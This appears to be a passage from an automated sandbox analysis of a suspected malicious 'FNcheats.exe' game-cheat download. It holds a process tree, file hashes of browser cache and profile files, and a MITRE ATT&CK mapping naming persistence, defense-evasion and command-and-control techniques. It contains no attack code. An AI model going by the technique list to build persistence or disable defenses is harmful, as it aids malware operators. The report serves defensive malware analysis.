  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:3824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5768 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6056 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6292 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6436 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6588 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:4556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6596 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:4676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6864 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:1916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7040 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:5016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7484 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7624 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:1988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7532 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7936 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=8084 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=8224 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:3692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=8364 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=8520 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:1928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=8664 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=8376 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=8952 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=9100 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:5136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=9848 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=9352 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=9460 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=10256 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=9804 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=9432 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=9536 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10244 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=10872 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=10752 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=10884 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=10892 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=10724 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:5144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=11064 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:6052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=11684 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=10576 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=10592 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=10540 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=10608 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=9684 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=10584 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=10520 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=9616 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=10092 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=11376 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=12004 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:7984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=13284 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:8020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=13492 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:8180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=11240 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:8908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=12432 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:9148

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3276

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x0000000000000480
1⤵
PID:5640

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6024

C:\Users\Admin\AppData\Local\Temp\Temp1_fncheats.zip\fncheats\FNcheats.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_fncheats.zip\fncheats\FNcheats.exe"
1⤵
PID:8264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002f

Filesize
1024KB

MD5
d09169ddb8ada93911943e5a7d178271

SHA1
7289998b24f5003af4d9f386b5309b7493580263

SHA256
64449f1e490919a1df0e4c8a6c15d1faccf359adacf88113618dd0f204566835

SHA512
22e944c61adb574bef0058b37f548aa8fbec097824f54925819b9111a25382a000403feb4564c418152bb7cddcf5f5ee266328fb0c91f956405d24b141b915de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000043

Filesize
250KB

MD5
29b1adf527657e404731bcb7271b79f8

SHA1
50aae42abf35013822edd2004b109c1dca12e96b

SHA256
4fbab2df29d82f1d5d1ab88a4cd42dfbfd777934ed5b177324542239df37bcc8

SHA512
17d123f7b9e62a158ab2589750da30e0d8290f910052d0d464a7f5a40d4e5011c8c33ee4804000fbc52f1c4e27b8d04cf7fd1bf13a9a9b07ac2376fad1e6ed56

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000045

Filesize
64KB

MD5
475b50689dfe5ac600b3de04ace088ea

SHA1
fbb328c285b985d98e436e1a2025dc2ef814f08d

SHA256
bb3580399452f7fc44aa591302242cc83e1a1c5daad646fcc2d1d3e81b9b7bc1

SHA512
55bef283c23fe00a25ab86c8e62df455236bb4a114d72da8986d0ab51b46567f195d35f94de1e133ae61e95d121de99938aa02e80abfd38c3c841fde9214c381

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\755258caa655e269_0

Filesize
38KB

MD5
633db6522f0352f09879e41ee7c6657d

SHA1
05e73c9795d1dc64e74b93ccb1d6ff97e6cc3145

SHA256
1a005da78432f7afe8a74b3a03cf3df57b2fe8fc3ee65afb565a6ee699513dc9

SHA512
ebe4fb66ab2327ed7543f0f610748a009dc69743885c87a61b5aa153337a0c2bbc783f95617af6ade0058d09c0e43a00f3b634d8d2564eeed8b46766d76c4e8c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\d5e42077b85df235_0

Filesize
271B

MD5
c0f630e191731a0d6378d306ba38e727

SHA1
c51537a0d15a0f9f9c498b21a942db467dfd9783

SHA256
6c188595127c2f9353557feb03784087274e9b82f46dd0023a57f73eb3ac5f48

SHA512
d54aab46c3d1a66764375cc182844ffa40c585e6f4677776eb9c7c22bbfd6074b0cdd573716a08b8a6af6ebf99e6d4312100f66f75bfbfb6b6466e87d34daf3f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_sync.a-mo.net_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.file.io_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
19KB

MD5
b0a23acfb3e8435d08bedfaf86d51a53

SHA1
48402d05b9470dc20a39cf5b7c43c279c0773b5e

SHA256
91d0a4dddbf143a7906ed5ae6a2fd0bea28ec5d424f78ecb193cbc989c41cf1a

SHA512
63c734694ffd39ffd2d139639768f98875a13679afd40f39b031911d246dd1d8cb58e38ca4255bbad4aab9ddc37884f959662276df0b01ebcdd93816c44a31c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
e059cfa27c688fa1b78304b4999d5d1d

SHA1
33d542abff6d94a3adde41fe6f930b70566c381b

SHA256
0cc5a5d575e85c8c07c79550cb993b62ad32a34cd3eeba55d9137c0b2eefc3b2

SHA512
1e8ef95107ff0831340ec5f463452fa16c1f1a8f5407d24627de39dd4089fd712cb5a522ad3f83ec9b261db985e7f7cf5b2003338aaedc5d2343864f6fe9a421

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
da7927ded95e557f7371e14ac60bc083

SHA1
56db44cff646eccfc6c77dcd478f0128169e0156

SHA256
e5fa912bb4ba6746de79291c81e38ff78635bc9e276f15c658a7f85bf3d3f0b2

SHA512
d48975a77f686fb70d894503cc8710c8707423882901cbdb28bfe8c784d72259a6ef38d972cbf0e54fb527089cb65ff29c24db516d09d399f733599b3f11cea3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
d42d99b7264e3f419eb5e2861391aae8

SHA1
9b2eed78078e4cbe2c66d8156425aeba270e8cac

SHA256
ce61ffbe211761b552bf221c7d27dc9bf2fe6c499dbd630f3bef08c8486e11eb

SHA512
16696f179cc754bf52a3fb91bbd93794f8838ff1260b449ccb914fd39092b9af44736a72ab7e9bd5cae14fedbdd83915c08ab61c999620c7ba911ef317529d12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
78ed07a3574a8580c4fd5234ec58f19c

SHA1
05a374fdc910d26cfb11593384da27e88d126efa

SHA256
18e574ca40a826a6a464f2188b42a05362fd67bd704963b5dc89136b290b337d

SHA512
8a32dc13ef942bcd8d4b3834cd6af1a213211d55c7db131d5ba8475770ca7ace78ae2b4af663bb2d6dd9d1b1ae1dd8d70e05ce1999ffd3e9f273845dcf1c9dde

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
8c07cad43ce42d896dbbf980d0eb351a

SHA1
7a6c583eb45da62642792f809517ac42cf9e3cda

SHA256
8784cf1e89ca104b13f0438bffb8b5d3382be48e533dd684bb27072c1dad93fd

SHA512
0806917c43cbd43dd94108de5d5235c27f0df520b0fd6ac68e8d204954ac6cb2366d2a6a95dff2b43182035b96fbc560eb5290096d9cc9716a54340f96cb1fcc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
e4d8fca8d97efd158e1dfa0740e31e70

SHA1
c54a00bb6b56d3ccb60f8257081de5e38a6ceeee

SHA256
db301a6e444cd1860a3ea0cb9217ca8fbfc2c426b556af8bbe6e847fa94f73d9

SHA512
1a83949247b2451b0875571ac0fe50d605b9be9012db39337b8dd55a2391d9b8772385766378a4cab627311fdd8ffe9ef7c1db327e536eae554cdb321922d5bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
4ee5342cfdbb233d547ec922ff1f6ec7

SHA1
b615002d81289ce62f1d8ff0096f3bacb4638bdf

SHA256
e72f11f63a8a098614179e795a0907395ede7b78a7c70bd939d8bbf83a489eda

SHA512
030ccbfd736375ffad64a2637138ea3d20d026ee2fdb31bd882fc6de6c470b79504b09996d9b49f9ebd221af3eafa48a5d94f97a13db8f6f11875534630a33f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
256KB

MD5
23e2dce2a3b180e3b9c1c526ccb9915b

SHA1
ad65557c7ff95589c895a766f64597a17bf6249d

SHA256
8d489cf51d0ed53371ee5f4adf187bef49f9e8100587ec19019c308e0b76cb65

SHA512
3dfb178590b91fa2b7ccd98c5da6f93d0b75e74bf79c75ee6c8814d3c01e2f127da87ab25ae22314c6bdfd17c5a21f0612dcda313ef93295eba4d6dd436ab867

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
94KB

MD5
35d615e4072302fa086c7df0d0b7a7d2

SHA1
eaf9227427f7850f8c3b9005bbd2ac4bf341f73e

SHA256
0e62f4c6fa271e7becec01769845ee268930fc4306872765319cf727fad6edea

SHA512
38d75dca6f85601b197ab267a7e652a7b3f5986df4dcb6d2bad3432a9da20ae8971011d372b20a0af16c185d805e5feb0eb1840dcf2faa4c42a644f105ac5f9a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe593bc7.TMP

Filesize
82KB

MD5
36c1ed9a1232580dbb799f40268a8415

SHA1
42b7e6f7ebbfd54980f815d418106fd312596797

SHA256
60672bd769d46f6e2a586fbb9ef395856e015b4ad3fb3fa039529145c754d16a

SHA512
36f4fc4fe3355862e4bacad0289e5786c70d2fd5ca6a30dc6e693b2982971ca96aaafbfa0931a753684e42ce996c011b423f4eb1a61352c3c5a38ad7b25b8175

Download Submit
